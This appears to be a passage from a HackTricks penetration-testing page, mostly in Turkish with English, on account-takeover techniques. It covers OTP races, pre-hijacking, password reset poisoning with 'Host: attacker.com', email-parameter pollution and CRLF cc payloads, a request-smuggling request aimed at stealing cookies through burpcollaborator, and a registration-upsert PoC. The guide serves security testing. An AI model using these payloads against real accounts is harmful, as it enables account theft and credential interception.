def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: aynı geçerli OTP'yi iki oturumda eşzamanlı olarak gönderin; bazen bir oturum doğrulanmış saldırgan hesabı olurken kurban akışı da başarılı olur.
- Also test Host header poisoning on verification links (same as reset poisoning below) to leak or complete verification on attacker controlled host — verification link'lerinde Host header poisoning'i test edin (aşağıdaki reset poisoning ile aynı); attacker controlled host üzerinde verification'ı leak etmek veya tamamlamak mümkün olabilir.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

Kurban hesap oluşturulmadan önce saldırganın kurbanın e‑postası üzerinde işlem yapıp daha sonra erişimi geri kazanması güçlü bir sorun sınıfı oluşturur.

Key techniques to test (adapt to the target’s flows):

- Classic–Federated Merge
- Attacker: kurban e‑postası ile classic bir hesap kaydeder ve şifre belirler
- Victim: daha sonra SSO ile (aynı e‑posta) kayıt olur
- Güvensiz merges her iki tarafı da oturumda bırakabilir veya saldırganın erişimini yeniden ortaya çıkarabilir
- Unexpired Session Identifier
- Attacker: hesap oluşturur ve uzun‑ömürlü bir oturum tutar (çıkış yapmayın)
- Victim: şifreyi kurtarır/ayarlar ve hesabı kullanır
- Test if old sessions stay valid after reset or MFA enablement
- Trojan Identifier
- Attacker: önceden oluşturulmuş hesaba ikincil bir tanımlayıcı ekler (telefon, ek e‑posta, veya saldırganın IdP'sini bağlar)
- Victim: şifreyi sıfırlar; saldırgan daha sonra trojan identifier'ı kullanarak sıfırlama/giriş yapar
- Unexpired Email Change
- Attacker: e‑posta değişikliğini saldırgana ait e‑posta olarak başlatır ve onayı bekletir
- Victim: hesabı kurtarır ve kullanmaya başlar
- Attacker: daha sonra bekleyen e‑posta değişikliğini tamamlayarak hesabı çalar
- Non‑Verifying IdP
- Attacker: e‑posta sahipliğini doğrulamayan bir IdP kullanarak `victim@…` iddiasında bulunur
- Victim: klasik yoldan kayıt olur
- Service merges on email without checking `email_verified` or performing local verification

Practical tips

- Harvest flows and endpoints from web/mobile bundles. Look for classic signup, SSO linking, email/phone change, and password reset endpoints.
  - Web/mobile bundle'larından akışları ve endpoint'leri toplayın. classic signup, SSO linking, email/phone change ve password reset endpoint'lerini arayın.
- Create realistic automation to keep sessions alive while you exercise other flows.
  - Diğer akışları test ederken oturumları canlı tutmak için gerçekçi otomasyon oluşturun.
- For SSO tests, stand up a test OIDC provider and issue tokens with `email` claims for the victim address and `email_verified=false` to check if the RP trusts unverified IdPs.
  - SSO testleri için bir test OIDC provider kurun ve RP'nin doğrulanmamış IdP'lere güvenip güvenmediğini kontrol etmek için kurban adresi için `email` claim'leri ve `email_verified=false` ile token'lar verin.
- After any password reset or email change, verify that:
  - all other sessions and tokens are invalidated,
  - pending email/phone change capabilities are cancelled,
  - previously linked IdPs/emails/phones are re‑verified.
  - Herhangi bir parola sıfırlama veya e‑posta değişikliğinden sonra doğrulayın ki:
    - tüm diğer oturumlar ve token'lar geçersiz kılınmış olsun,
    - bekleyen e‑posta/telefon değişikliği yetenekleri iptal edilmiş olsun,
    - önceden bağlı IdP'ler/e‑postalar/telefonlar yeniden doğrulansın.

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Request password reset to your email address
   - E‑posta adresinize password reset talebi gönderin
2. Click on the password reset link
   - Password reset link'ine tıklayın
3. Don’t change password
   - Parolayı değiştirmeyin
4. Click any 3rd party websites(eg: Facebook, twitter)
   - Herhangi üçüncü taraf bir siteye (örn: Facebook, twitter) tıklayın
5. Intercept the request in Burp Suite proxy
   - İsteği Burp Suite proxy'sinde yakalayın
6. Check if the referer header is leaking password reset token.
   - Referer header'ının password reset token'ı leak edip etmediğini kontrol edin.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
   - Password reset isteğini Burp Suite'te yakalayın
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
   - Burp Suite'te aşağıdaki header'ları ekleyin veya düzenleyin: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
   - Değiştirilmiş header ile isteği iletin\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Look for a password reset URL based on the _host header_ like : `https://attacker.com/reset-password.php?token=TOKEN`
   - Host header'a dayalı bir password reset URL'si arayın, örn: `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR on API Parameters

1. Saldırgan kendi hesabıyla giriş yapmalı ve Change password özelliğine gitmeli.
2. Burp Suite’i başlatın ve isteği Intercept edin
3. İsteği repeater sekmesine gönderin ve parametreleri düzenleyin : User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Zayıf Parola Sıfırlama Token’ı

Password reset token her seferinde rastgele oluşturulmalı ve benzersiz olmalıdır.
Token’ın süresinin dolup dolmadığını veya her zaman aynı olup olmadığını belirlemeye çalışın; bazı durumlarda üretim algoritması zayıf olabilir ve tahmin edilebilir. Aşağıdaki değişkenler algoritma tarafından kullanılabilir.

• Zaman damgası
• UserID
• Kullanıcının Email’i
• İsim ve Soyisim
• Doğum Tarihi
• Kriptografi
• Sadece sayı
• Küçük token dizisi (karakterler arasında [A-Z,a-z,0-9])
• Token tekrar kullanımı
• Token’ın sona erme tarihi

Leaking Password Reset Token

1. Belirli bir email için API/UI kullanarak bir password reset isteği tetikleyin e.g: test@mail.com
2. Sunucu yanıtını inceleyin ve resetToken’ı kontrol edin
3. Daha sonra token’ı şu şekilde bir URL’de kullanın: https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Kullanıcı Adı Çakışması Yoluyla Parola Sıfırlama

1. Sisteme, mağdurun kullanıcı adıyla özdeş ancak kullanıcı adının önüne ve/veya sonuna boşluklar eklenmiş bir username ile kayıt olun. e.g: "admin "
2. Kötü niyetli username’inizle parola sıfırlama isteği gönderin.
3. E-posta adresinize gönderilen token’ı kullanarak mağdurun parolasını sıfırlayın.
4. Yeni parola ile mağdur hesabına giriş yapın.

CTFd platformu bu saldırıya karşı savunmasızdı.
See: CVE-2020-7245

Hesap Ele Geçirme Yoluyla Cross Site Scripting

1. Uygulama içinde veya çerezler parent domain’e scoped ise bir subdomain’de XSS bulun : *.domain.com
2. Leak the current sessions cookie
3. Cookie kullanarak kullanıcı olarak kimlik doğrulayın

Hesap Ele Geçirme Yoluyla HTTP Request Smuggling

1. HTTP Request Smuggling türünü (CL, TE, CL.TE) tespit etmek için smuggler kullanın
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. POST / HTTP/1.1 üzerine aşağıdaki verilerle overwrite edecek bir istek oluşturun:
   GET http://something.burpcollaborator.net HTTP/1.1 X: hedef, kurbanları burpcollab’e open redirect ile yönlendirip cookies’lerini çalmak
3. Son istek aşağıdaki gibi görünebilir

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone raporları bu hatanın istismar edildiğini gösteriyor\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

CSRF ile Hesap Ele Geçirme

1. CSRF için bir payload oluşturun, örn: “HTML form with auto submit for a password change”
2. Payload’u gönderin

JWT ile Hesap Ele Geçirme

JSON Web Token bir kullanıcıyı authenticate etmek için kullanılabilir.

• JWT içindeki User ID / Email’i değiştirin
• Zayıf JWT imzası için kontrol edin

JWT Vulnerabilities (Json Web Tokens)

Kayıt Olarak Sıfırlama (Upsert on Existing Email)

Bazı signup handler’ları, sağlanan email zaten mevcutsa bir upsert gerçekleştirir. Eğer endpoint email ve password içeren minimal bir body kabul ediyor ve ownership verification uygulamıyorsa, victim’in email’ini göndererek password’lerini pre-auth olarak üzerine yazabilirsiniz.

• Keşif: bundled JS (veya mobil uygulama trafiği) içinden endpoint isimlerini toplayın, sonra ffuf/dirsearch kullanarak /parents/application/v4/admin/FUZZ gibi base path’leri fuzz’leyin.
• Yöntem ipuçları: a GET returning messages like “Only POST request is allowed.” often indicates the correct verb and that a JSON body is expected.
• Gerçek dünyada gözlemlenen minimal body:

{"email":"victim@example.com","password":"New@12345"}

Örnek PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Etkisi: Full Account Takeover (ATO) herhangi bir reset token, OTP veya email verification olmadan.

Referanslar

• Kritik Bir Password Reset Bug’ını Nasıl Buldum (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

• abonelik planlarını kontrol edin!
• 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
• Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.